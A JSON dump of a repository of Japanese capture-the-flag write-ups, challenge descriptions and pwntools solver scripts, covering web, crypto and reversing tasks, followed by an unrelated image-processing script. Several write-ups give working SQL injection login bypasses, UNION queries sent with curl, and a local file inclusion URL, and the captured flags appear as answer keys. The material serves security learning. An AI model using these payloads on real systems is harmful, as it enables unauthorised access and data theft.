5\",null,911811804,null,0]\n,[\"6\",null,911811804,null,0]\n,[\"7\",null,911811804,null,0]\n,[\"8\",null,911811804,null,0]\n,[\"9\",null,911811804,null,0]\n,[\"0\",null,911811804,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n]\n,[\"Congratulations! The flag is pbctf{\\u003cdigits you got along the way\\u003e_\\u003cpassword\\u003e}\",1,0,0,0]\n,null,null,[0,0]\n,null,null,\"Enter combination code\",48,[null,null,null,null,0]\n,null,null,null,null,[2]\n,[[1,1,1,1,1]\n,1]\n]\n,\"/forms\",\"Combolock PROD\",null,null,null,\"\",null,0,0,null,\"\",0,\"e/1FAIpQLSe7sOTLHmGjmUY3iE6E7QLqeYAZDfQXsiJrz8r-ZcA_4cXNFQ\",0,\"[]\",0,0]\n;\n```\n</details>\n\n<br>\n\n0~9の選択肢があるので、どうやら`FB_PUBLIC_LOAD_DATA_`という変数はフォームの状態遷移を示しているようだ。\n\nこの情報をもとに状態遷移を答えから逆算する。\n\n初期状態:State938169490\n\n終了状態:State751651474\n\n```mermaid\nstateDiagram\n [*] --> State938169490\n State938169490 --> State1114266997:5\n State1114266997 --> State1094087816:8\n State1094087816 --> State147720654:1\n State147720654 --> State1737460359:2\n State1737460359 --> State1996292448:6\n State1996292448 --> State1138684813:9\n State1138684813 --> State46599266:3\n State46599266 --> State1566374398:3\n State1566374398 --> State1385363611:7\n State1385363611 --> State751651474:0\n State751651474 --> [*]\n```\n\n結果的に、`5812693370` と進むと以下のフォームが表示される状態にたどり着く。\n\n![](img/2020-12-05-15-13-40.png)\n\n`Congratulations! The flag is pbctf{<digits you got along the way>_<password>}`\n\nパスワードはソースに書いてある通り`s3cuR3_p1n_id_2_3v3ry0ne`なので、先ほどの数字と組み合わせればフラグが得られる。\n\n<!-- pbctf{5812693370_s3cuR3_p1n_id_2_3v3ry0ne} -->\n\n\n" }, { "alpha_fraction": 0.5100671052932739, "alphanum_fraction": 0.7583892345428467, "avg_line_length": 29, "blob_id": "f55929455b5b676a590bc01d47aa27be7b9b5dda", "content_id": "368b03ce343526d374b8376d260182a77da43c08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 149, "license_type": "no_license", "max_line_length": 100, "num_lines": 5, "path": "/2021/BambooFox_CTF_2021/Flag_Checker/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "![](img/2021-01-16-17-28-38.png)\n\nauthor: CSY54\n\n[upload.zip](https://ctf.bamboofox.tw/files/b9102b9d65dcbb23fb20fc5442555786/upload.zip?token=eyJ1c2VyX2lkIjoxMDMxLCJ0ZWFtX2lkIjo0NDIsImZpbGVfaWQiOjI2fQ.YAKjvw.QyKq1YfNy_fwj7VQj6GTF1DdWKg)" }, { "alpha_fraction": 0.45681819319725037, "alphanum_fraction": 0.5295454263687134, "avg_line_length": 11.571428298950195, "blob_id": "447b21cc385142f8ef7b080b8f5cac0fc507fae5", "content_id": "8b16769af697318d9421dfe05f53fdb8cd10d900", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 640, "license_type": "no_license", "max_line_length": 56, "num_lines": 35, "path": "/2021/BCACTF_2.0/Movie-Login-3/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49162/ にアクセスする。\n\n`Movie-Login-1`と同様にログイン画面が表示される。\n\n![](img/2021-06-13-15-19-41.png)\n\n問題に添付されているjsonファイルは以下のようになっており、ここに書かれている文字は使えないようになっている。\n\n```json\n[\n \"and\",\n \"1\",\n \"0\",\n \"true\",\n \"false\",\n \"/\",\n \"*\",\n \"=\",\n \"xor\",\n \"null\",\n \"is\",\n \"<\",\n \">\"\n]\n```\n\n`username = admin`, パスワードを以下のようにしたらログインできた。\n\n```\n2' or '3' & '5\n```\n\n<!-- bcactf{gu3ss_th3r3s_n0_st0pp1ng_y0u!} -->\n" }, { "alpha_fraction": 0.6038185954093933, "alphanum_fraction": 0.7088305354118347, "avg_line_length": 27, "blob_id": "7e13e46d5bb7c2cd2d9322181afcd4ecdfe06ce1", "content_id": "f2a37cdc77fd24d27b1cebcb796bf6b7798d8579", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 594, "license_type": "no_license", "max_line_length": 93, "num_lines": 15, "path": "/2021/WeCTF_2021/Include/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[http://include.sf.ctf.so/](http://include.sf.ctf.so/) にアクセスすると、以下のようなメッセージが表示される。\n\n![](img/2021-06-20-12-15-28.png)\n\nGETパラメータに 🤯 とあるので、`http://include.sf.ctf.so/?%F0%9F%A4%AF=hoge`のようにして`@include`に任意の文字列を挿入できる。\n\nLocal File Inclusion(LFI) によって`/flag.txt`を読む。\n\n* http://include.sf.ctf.so/?%F0%9F%A4%AF=/flag.txt\n\nにアクセスすると、フラグが表示された。\n\n<!-- we{695ed01b-3d31-46d7-a4a3-06b744d20f4b@1nc1ud3_/etc/passwd_yyds!} -->" }, { "alpha_fraction": 0.7279999852180481, "alphanum_fraction": 0.800000011920929, "avg_line_length": 24.200000762939453, "blob_id": "31d54fec4dce264044daca6444de558db1cce7a9", "content_id": "4d8224eb942e3a4d21b36f47a8c39b026689e1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "no_license", "max_line_length": 58, "num_lines": 5, "path": "/2020/CyberSecurityRumble2020/Pady_McPadface/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "When your message is 99.95% padding, nothing can go wrong!\n\nnc chal.cybersecurityrumble.de 34187\n\nAuthor: rugo,manf|RedRocket" }, { "alpha_fraction": 0.6425120830535889, "alphanum_fraction": 0.6772946715354919, "avg_line_length": 26.263158798217773, "blob_id": "e15674ecb3110a2be0e3099d6433137845516351", "content_id": "a368f1fe50d100ee3d4b1aff6d46e3b3e3682632", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1345, "license_type": "no_license", "max_line_length": 137, "num_lines": 38, "path": "/2021/angstromCTF_2021/Sea_of_Quills/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`cols`, `limit`, `offset` のPOSTパラメータでクエリを実行する仕組みになっている。\n\n```rb\n@row = db.execute(\"select %s from quills limit %s offset %s\" % [cols, lim, off])\n```\n\nただし、`cols`には`blacklist`の文字が使えず、`limit`,`offset`には数字しか使えない。\n\n```rb\nblacklist = [\"-\", \"/\", \";\", \"'\", \"\\\"\"]\nblacklist.each { |word|\n if cols.include? word\n return \"beep boop sqli detected!\"\n end\n}\n\nif !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)\n return \"bad, no quills for you!\"\nend\n```\n\nUNION句を`cols`に入れて他のテーブルを探す。ソースコードからsqliteが使われていることが分かっているので、`sqlite_master`の`name`を参照する。\n\nUNIONの後半部分の列数は3なので前半部分も3に合わせておく。\n\n```bash\n$ curl https://seaofquills.2021.chall.actf.co/quills -X POST -d \"cols=name,0,0 from sqlite_master union select *&limit=10&offset=0\"\n```\n\n`flagtable`というテーブル名が存在していることが分かったので中身を見る。\n\n```bash\n$ curl https://seaofquills.2021.chall.actf.co/quills -X POST -d \"cols=*,*,* from flagtable union select *&limit=10&offset=0\" > index.html\n```\n\n<!-- actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df} -->" }, { "alpha_fraction": 0.6635071039199829, "alphanum_fraction": 0.7867298722267151, "avg_line_length": 18.272727966308594, "blob_id": "51a05ae80b85059dfed0a5d66ebf0a56980a431b", "content_id": "77c317c09a0809e45aef6d7261623f172c3d3fd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 221, "license_type": "no_license", "max_line_length": 88, "num_lines": 11, "path": "/2021/SECCON_Beginners_CTF_2021/GFM/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "* Github Flavored Markdown\n\n* Google Facebook Microsoft\n\n* And...?\n\n[gfm.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/gfm/gfm.tar.gz)\n\n0173234ba9eec065ffdf5ec88aed1e0e829f1038\n\n想定難易度: Easy" }, { "alpha_fraction": 0.7808988690376282, "alphanum_fraction": 0.7865168452262878, "avg_line_length": 58.33333206176758, "blob_id": "0ec74bc36191c611c5288c829c13c6e6ac304986", "content_id": "e863ee5c89e5f5f51d156131e23263ee60449f51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 178, "license_type": "no_license", "max_line_length": 108, "num_lines": 3, "path": "/2021/BCACTF_2.0/Slightly_Harder_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gerald's homework is getting trickier. He isn't being given the primes anymore. Help him find the plaintext!\n\n[enc.txt](https://objects.bcactf.com/bcactf2/easyFactorRSA/enc.txt)\n" }, { "alpha_fraction": 0.5857142806053162, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 18.964284896850586, "blob_id": "2b39da686164a241cf2ce9983d813d1427ffb637", "content_id": "e11786bcff6be46a6c72779f08ee7ea62ac847af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "no_license", "max_line_length": 64, "num_lines": 28, "path": "/2021/SECCON_Beginners_CTF_2021/Field_trip/problem.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom random import getrandbits\nfrom flag import flag\n\n\nflag = bytes_to_long(flag.encode(\"utf-8\"))\nflag = bin(flag)[2:]\nlength = len(flag)\n\nA = []\na, b = 0, 0\nfor _ in range(length):\n a += getrandbits(32) + b\n b += a\n A.append(a)\n\np = getStrongPrime(512)\nq = getStrongPrime(512)\n\nassert q > sum(A)\n\npub_key = [a * p % q for a in A]\ncipher = sum([int(flag[i]) * pub_key[i] for i in range(length)])\n\nf = open(\"output.txt\", \"w\")\nf.write(\"pub_key = \" + str(pub_key) + \"\\n\")\nf.write(\"cipher = \" + str(cipher) + \"\\n\")\nf.close()\n\n" }, { "alpha_fraction": 0.6894736886024475, "alphanum_fraction": 0.7736842036247253, "avg_line_length": 30.66666603088379, "blob_id": "50ce1e2379bf33f5d5cc64dc0caa379e895f6b28", "content_id": "c10e34d95372c4b3999665b854bd6f303bdee443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 190, "license_type": "no_license", "max_line_length": 100, "num_lines": 6, "path": "/2021/HeroCTF_v3/Find_Me/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Could you retrieve where this photo was taken ?\n\nFormat : Hero{place}\nAuthor : xanhacks\n\n[find_me.jpg](https://www.heroctf.fr/files/5aa5da2b04f0a3f9fa86f70c2dd825ae/find_me.jpg?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjIyfQ.YIUtng.3apAvQer1fGko_-NZQbb6yGxw-o)\n" }, { "alpha_fraction": 0.5981308221817017, "alphanum_fraction": 0.8177570104598999, "avg_line_length": 42, "blob_id": "a0638be6d3f29db9ab661e8b40d977e340ab29ab", "content_id": "a3d5d609dec2dc49dc340d38399246cfbcae7233", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 214, "license_type": "no_license", "max_line_length": 103, "num_lines": 5, "path": "/2021/angstromCTF_2021/Sea_of_Quills/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Come check out our [finest selection of quills](https://seaofquills.2021.chall.actf.co/)!\n\n[app.rb](https://files.actf.co/c6131fafd681ef59ee5167822702986f813b0e3177f3f7c78f1790adaac92384/app.rb)\n\nAuthor: JoshDaBosh" }, { "alpha_fraction": 0.5165975093841553, "alphanum_fraction": 0.5373443961143494, "avg_line_length": 23.149999618530273, "blob_id": "ad4f4bedc99a45e2a306a46a5095edc218959e77", "content_id": "f6ce29ebca6edba99adadea39d83c78a7fb0305b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 50, "num_lines": 20, "path": "/2021/BCACTF_2.0/Welcome_to_the_Casino/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nPARALLEL = 20\n\nio = [ _ for _ in range(PARALLEL)]\nwhile(True):\n for i in range(PARALLEL):\n io[i] = remote('misc.bcactf.com', '49156')\n\n for i in range(PARALLEL):\n io[i].recvuntil('Enter the letter \"')\n char = io[i].recvn(1).decode('utf-8')\n io[i].recvline()\n io[i].sendline(char)\n\n for i in range(PARALLEL):\n out = io[i].recvall().decode('utf-8')\n print(out)\n if 'bcactf' in out:\n exit()" }, { "alpha_fraction": 0.6056700944900513, "alphanum_fraction": 0.657216489315033, "avg_line_length": 19.421052932739258, "blob_id": "f41261165123bbfe539b58f548c842e1018a0638", "content_id": "84adb9322731434659aa541f1b84d703207c9e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 540, "license_type": "no_license", "max_line_length": 130, "num_lines": 19, "path": "/2021/redpwnCTF_2021/orm-bad/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttps://orm-bad.mc.ax/ にアクセスする。\n\nページのソースコードが与えられており、以下のSQL文を実行するようになっている。\n\n```js\ndb.all(\"SELECT * FROM users WHERE username='\" + req.body.username + \"' AND password='\" + req.body.password + \"'\", (err, rows) => {\n```\n\nUsername: `admin`\n\nPassword: `1' or '1' = '1`\n\nと入力したところ、adminでログインすることができ、フラグが得られた。\n\n![](img/2021-07-10-12-15-12.png)\n\n<!-- flag{sqli_overused_again_0b4f6} -->\n" }, { "alpha_fraction": 0.4963414669036865, "alphanum_fraction": 0.5182926654815674, "avg_line_length": 25.45161247253418, "blob_id": "f5094e037a440ed131f09d586880d1fe733fbaf4", "content_id": "a3e8659c48d5483493e5d35acb6d708b71113d3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 820, "license_type": "no_license", "max_line_length": 59, "num_lines": 31, "path": "/2021/ImaginaryCTF_2021/Imaginary/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nimport re\nfrom tqdm import tqdm\n\nio = remote('chal.imaginaryctf.org', '42015')\n\nio.recvuntil('so watch out!)\\n\\n')\n\nfor _ in tqdm(range(300)):\n out = io.recvline().decode('utf-8')\n nums = list(re.findall(r'\\(([0-9i+-]+)\\)', out))\n opts = list(re.findall(r'\\) ([+-]) \\(', out))\n opts = ['+'] + opts # first number is positive\n real, image = 0, 0\n for idx, num in enumerate(nums):\n num = list(map(int, list(re.findall(r'\\d+', num))))\n if opts[idx] == '+':\n real += num[0]\n image += num[1]\n else:\n real -= num[0]\n image -= num[1]\n if image >= 0:\n io.sendline(f'{real}+{image}i')\n else:\n io.sendline(f'{real}{image}i')\n if b'Correct!' not in io.recvline():\n break\n\nio.interactive()\nio.close()\n" }, { "alpha_fraction": 0.32003986835479736, "alphanum_fraction": 0.3878364861011505, "avg_line_length": 27.685714721679688, "blob_id": "efac645b5b69df7adac8ba7d6dc1f9ba094ab106", "content_id": "a3bd3070c0a625b262643deb671b61a332d1ccaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1013, "license_type": "no_license", "max_line_length": 89, "num_lines": 35, "path": "/2020/CyberSecurityRumble2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# CyberSecurityRumble CTF\n\n* http://ctf.cybersecurityrumble.de/\n\n* 2020/10/31 04:00 JST — 2020/11/02 04:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------------ | ---------------------- | -------------------- | ----: | -----: |\n| Web | [Cyberwall](Cyberwall) | OS Command Injection | 100 | 389 |\n| Crypto | [Hashfun](Hashfun) | XOR | 100 | 267 |\n| Reversing, C | [Zeh](Zeh) | XOR | 100 | 221 |\n\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ---- | ---------------------------------- | ------------------------ | ----: | -----: |\n| Math | [Pady McPadface](Pady_McPadface) | Quadratic residue (平方剰余) | 200 | 18 |\n| Web | [Wheels n Whales](Wheels_n_Whales) | PyYAML | 100 | 94 |\n\n---\n\n## Result\n\n* 300 points\n\n* 259 / 980 (all)\n\n* 259 / 474 (> 1 pt)" }, { "alpha_fraction": 0.6605504751205444, "alphanum_fraction": 0.7568807601928711, "avg_line_length": 15.84615421295166, "blob_id": "7a58d49f8b003bbabbd0ddcec84c1fc50d6b3f54", "content_id": "cad3a83e3fb289d36c5309b50a32ee0c43fba564", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 424, "license_type": "no_license", "max_line_length": 55, "num_lines": 13, "path": "/2021/UMassCTF_2021/Scan_Me/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n与えられた画像をGIMPで開くと、レイヤーが2つあることが分かった。下のレイヤーにはQRコードが書かれていた。\n\n![](img/2021-03-28-02-10-31.png)\n\n一部欠けているが読み取ることができ、以下のページへ飛ぶ。\n\n* https://imgur.com/a/57VgQ8M\n\nフラグが書かれた画像ファイルがアップロードされている。\n\n<!-- UMASS{QR-3Z-m0d3} -->" }, { "alpha_fraction": 0.4544450640678406, "alphanum_fraction": 0.5427940487861633, "avg_line_length": 22.828947067260742, "blob_id": "ba0727fcda0410af57debb147749aaf8716177e5", "content_id": "5e216d74bf637b9291c46c0ab3f97defeaf906fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1843, "license_type": "no_license", "max_line_length": 100, "num_lines": 76, "path": "/2021/angstromCTF_2021/FREE_FLAGS!!1!!/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n```c\n local_10 = *(long *)(in_FS_OFFSET + 0x28);\n puts(\n \"Congratulations! You are the 1000th CTFer!!! Fill out this short survey to get FREE FLAGS!!!\"\n );\n puts(\"What number am I thinking of???\");\n __isoc99_scanf(\"%d\",&local_11c);\n if (local_11c == 0x7a69) {\n puts(\"What two numbers am I thinking of???\");\n __isoc99_scanf(\"%d %d\",&local_120,&local_124);\n if ((local_120 + local_124 == 0x476) && (local_120 * local_124 == 0x49f59)) {\n puts(\"What animal am I thinking of???\");\n __isoc99_scanf(\" %256s\",local_118);\n sVar2 = strcspn(local_118,\"\\n\");\n local_118[sVar2] = '\\0';\n iVar1 = strcmp(local_118,\"banana\");\n if (iVar1 == 0) {\n puts(\"Wow!!! Now I can sell your information to the Russian government!!!\");\n puts(\"Oh yeah, here\\'s the FREE FLAG:\");\n print_flag();\n local_128 = 0;\n }\n else {\n puts(\"Wrong >:((((\");\n local_128 = 1;\n }\n }\n else {\n puts(\"Wrong >:((((\");\n local_128 = 1;\n }\n }\n else {\n puts(\"Wrong >:((((\");\n local_128 = 1;\n }\n if (*(long *)(in_FS_OFFSET + 0x28) == local_10) {\n return local_128;\n }\n```\n\n1. `local_11c == 0x7a69` \n\n2. `local_120 + local_124 == 0x476 && local_120 * local_124 == 0x49f59`\n\n3. `strcmp(local_118,\"banana\")`\n\nを満たす値を入力していけばよい。\n\n```py\nfrom pwn import *\n\ndef solve(b,c):\n a = 1\n b = -b\n x1 = (-b + math.sqrt(b**2-4*a*c))/(2*a)\n x2 = (-b - math.sqrt(b**2-4*a*c))/(2*a)\n return [str(int(x1)), str(int(x2))]\n\nio = remote('shell.actf.co', 21703)\n# 1\nio.recvuntil('What number am I thinking of???')\nio.sendline(str(int(0x7a69)))\n# 2\nio.recvline()\nio.sendline(' '.join(solve(0x476,0x49f59)))\n# 3\nio.recvline()\nio.sendline('banana')\n\nio.interactive()\n```\n\n<!-- actf{what_do_you_mean_bananas_arent_animals} -->\n" }, { "alpha_fraction": 0.6236461997032166, "alphanum_fraction": 0.6633573770523071, "avg_line_length": 18.76785659790039, "blob_id": "0e53f94bb082dcd4b24647aca95ff6ce5a7f5255", "content_id": "cef7dbba06630bf3f8f04d357225bb7cefce5343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1528, "license_type": "no_license", "max_line_length": 93, "num_lines": 56, "path": "/2020/WaniCTF/exclusive/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n暗号化のプログラムを読む。\n\n```py\nkey = \"REDACTED\"\nflag = \"FAKE{this_is_fake_flag}\"\n\nassert len(key) == len(flag) == 57\nassert flag.startswith(\"FLAG{\") and flag.endswith(\"}\")\nassert key[0:3] * 19 == key # (1)\n\n\ndef encrypt(s1, s2):\n assert len(s1) == len(s2)\n\n result = \"\"\n for c1, c2 in zip(s1, s2):\n result += chr(ord(c1) ^ ord(c2)) #(2)\n return result\n\n\nciphertext = encrypt(flag, key)\nprint(ciphertext, end=\"\")\n```\n\n(2) より、`flag`と`key`に対して1文字ずつXORを計算していることが分かる。そして、(1) より、`key`は3文字の繰り返しであることも分かる。\n\nXORは同じものを2回演算すると元に戻る性質があるので、`ciphertext`の先頭3文字と`plaintext`の先頭3文字`FLA`をXOR演算して`key`を求めることができる。\n\n`key`が求まったら、`key`を19回繰り返したものと`ciphertext`をXOR演算して`plaintext`を求めることができる。\n\n以下のプログラムを実行してフラグを取得。\n\n```py\n# ファイル読み込み\nwith open('./output.txt') as f:\n ciphertext = f.read()\n\n# s1,s2に対してXOR演算を行う\ndef decrypt(s1, s2):\n assert len(s1) == len(s2)\n\n result = \"\"\n for c1, c2 in zip(s1, s2):\n result += chr(ord(c1) ^ ord(c2))\n return result\n\n# 先頭3文字のXORをとってKeyを計算\nkey = decrypt(ciphertext[0:3],'FLA')\n\n# Keyの繰り返しと暗号文のXORを計算\nplaintext = decrypt(key*19,ciphertext)\n\nprint(plaintext)\n```\n\n" }, { "alpha_fraction": 0.5704077482223511, "alphanum_fraction": 0.6536359786987305, "avg_line_length": 25.44444465637207, "blob_id": "48cdfcf23cb6488a117dbc70522989d92a4b01ff", "content_id": "74d7ed226bff343062ffdab176d1d51b8b049974", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2723, "license_type": "no_license", "max_line_length": 204, "num_lines": 90, "path": "/2021/angstromCTF_2021/Im_so_Random/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n8桁の整数をシードにして生成された2つの乱数の積を当てればフラグが得られる。\n\n```py\nr1 = Generator(random.randint(10000000, 99999999))\nr2 = Generator(random.randint(10000000, 99999999))\n\n...\n\nif guess != r1.getNum() * r2.getNum():\n```\n\n現在のシードをもとに次の乱数を作るので、積を元通りに分解することができればよい。\n\n2つの乱数の積に分解するために素因数分解をする。因数の数が多いと積のパターンが増えるため、リトライする。\n\n正しく分解できているかは、その2つの値をシードにして新しい乱数を生成し、積を確かめればよい。\n\n![](img/2021-04-10-04-01-37.png)\n\n```py\nimport os\nos.environ['PWNLIB_NOTERM'] = 'True' # sage & pwntools\n\nfrom pwn import *\nimport re\nimport itertools\n\nclass Generator():\n DIGITS = 8\n def __init__(self, seed):\n self.seed = seed\n assert(len(str(self.seed)) == self.DIGITS)\n\n def getNum(self):\n self.seed = int(str(self.seed**2).rjust(self.DIGITS*2, \"0\")[self.DIGITS//2:self.DIGITS + self.DIGITS//2])\n return self.seed\n\nio = remote('crypto.2021.chall.actf.co','21600')\n\nio.sendline('r')\nr1 = int(re.search(r'\\d+', io.recvline().decode('utf-8')).group())\nprint(r1)\nio.sendline('r')\nr2 = int(re.search(r'\\d+', io.recvline().decode('utf-8')).group())\nprint(r2)\nF = factor(r1)\nf = [f[0] for f in F for _ in range(f[1])]\nif len(f) >= 6:\n io.close()\n exit()\nperm = [p for p in itertools.permutations(f)]\nfound = False\nfor p in perm :\n a = 1\n for n in p:\n if a * n < 99999999:\n a *= n\n else:\n break\n b = r1 // a\n if 10000000 <= a <= 99999999 and 10000000 <= b <= 99999999:\n g1 = Generator(a)\n g2 = Generator(b)\n else:\n continue\n if(g1.getNum()*g2.getNum() == r2):\n found = True\n break\nif found:\n io.sendline('g')\n io.sendline(str(g1.getNum()*g2.getNum()))\n io.sendline(str(g1.getNum()*g2.getNum()))\n io.interactive()\n```\n\n```\n[x] Opening connection to crypto.2021.chall.actf.co on port 21600\n[x] Opening connection to crypto.2021.chall.actf.co on port 21600: Trying 52.207.14.64\n[+] Opening connection to crypto.2021.chall.actf.co on port 21600: Done\n2390425919415506\n1315460154934982\n[*] Switching to interactive mode\nWould you like to get a random output [r], or guess the next random number [g]? What is your guess to the next value generated? What is your guess to the next value generated? Congrats! Here's your flag: \nactf{middle_square_method_more_like_middle_fail_method}\n[*] Got EOF while reading in interactive\n```\n\n<!-- actf{middle_square_method_more_like_middle_fail_method} -->" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7933333516120911, "avg_line_length": 41.85714340209961, "blob_id": "de02937d735731c97edd554533b569bceb9af915", "content_id": "e863f7311c0fc55e58f4bb5d0689c5235ea8d8b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 300, "license_type": "no_license", "max_line_length": 130, "num_lines": 7, "path": "/2021/redpwnCTF_2021/orm-bad/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I just learned about orms today! They seem kinda difficult to implement though... Guess I'll stick to good old raw sql statements!\n\n[orm-bad.mc.ax](https://orm-bad.mc.ax/)\n\nDownloads\n\n[app.js](https://static.redpwn.net/uploads/eb4c66c15fe3013340068ef0a34bd5dd5c0c98c567fac53b158d56afe07b511c/app.js)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7973856329917908, "avg_line_length": 50, "blob_id": "91f04f709643eafc2cdad119e043f97e93a90b7b", "content_id": "c3be8178504913b42c6bc679b4e629eea5d58037", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 153, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/2021/dCTF_2021/This_one_is_really_basic/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The answer to life, the universe, and everything.\n\n[cipher.txt](https://dctf.dragonsec.si/files/51555fa45bd2a8345dec6914ad89f3a8/cipher.txt?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTY1fQ.YJ-eBw.kYjrWAZzAGy2ifIzIDgmOM76090)\n" }, { "alpha_fraction": 0.7083333134651184, "alphanum_fraction": 0.7083333134651184, "avg_line_length": 31, "blob_id": "7984121b8b8a8498913709ad3667c4956a68674b", "content_id": "5fb0bd03f9994259eb17264b559f1ebb830f294c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 96, "license_type": "no_license", "max_line_length": 48, "num_lines": 3, "path": "/2021/redpwnCTF_2021/inspect-me/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "See if you can find the flag in the source code!\n\n[inspect-me.mc.ax](https://inspect-me.mc.ax/)\n" } ]
435
cmyk-p4nd4/img_processing
https://github.com/cmyk-p4nd4/img_processing
d5882cbecf856edff64f4b770ab5d9268f578bf5
23bf5dd7e3e1b9234a48d81a37f3cb2883bc518a
01fd6b0a817312b4b85af56d2b6badd21552c8ee
refs/heads/master
2023-01-13T22:06:14.508234
2020-11-17T11:32:21
2020-11-17T11:32:21
312,649,581
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6496415734291077, "avg_line_length": 33.90625, "blob_id": "ff8dd2cde3475262b9f62720c84e3320b547b37b", "content_id": "86c21df56dd52e4a84de9435840a1603a43f8376", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 71, "num_lines": 32, "path": "/extraction.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nfrom cv2 import cv2\n\ndef mat2gray(A):\n A = np.double(A)\n out = np.zeros(A.shape, np.double)\n normalized = cv2.normalize(A, out, 1.0, 0.0, cv2.NORM_MINMAX)\n return normalized\n\ndef rgb2gray(rgb):\n return np.dot(rgb[..., :3], [0.299, 0.587, 0.144])\n\nA = plt.imread('sampleImg/test_color.jpg')\nA_gray = rgb2gray(A)\nnc, nr = A_gray.shape\nplt.imsave(\"test_gray.jpg\", A_gray)\nSx = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]]) # Sobel operator\nSy = np.array([[-1, -2, -1], [0, 0, 0], [1, 2, 1]]) # Sobel operator\nAx = signal.correlate2d(A_gray, Sx, mode='same')\nAy = signal.correlate2d(A_gray, Sy, mode='same')\nplt.figure(num=\"Image\")\nplt.subplots_adjust(left=0.0, bottom=0.0, right=1.0, top=1.0)\nplt.subplot(2,2,1); plt.imshow(A); plt.axis('off')\nplt.subplot(2,2,2); plt.imshow(A_gray, cmap='gray'); plt.axis('off')\nplt.subplot(2,2,3); plt.imshow(np.uint8(mat2gray(Ax)*255), cmap='gray')\nplt.axis('off')\nplt.subplot(2,2,4); plt.imshow(np.uint8(mat2gray(Ay)*255), cmap='gray')\nplt.axis('off')\nplt.show()\nprint(A.shape,A_gray.shape)" }, { "alpha_fraction": 0.5561047792434692, "alphanum_fraction": 0.586258053779602, "avg_line_length": 30.625, 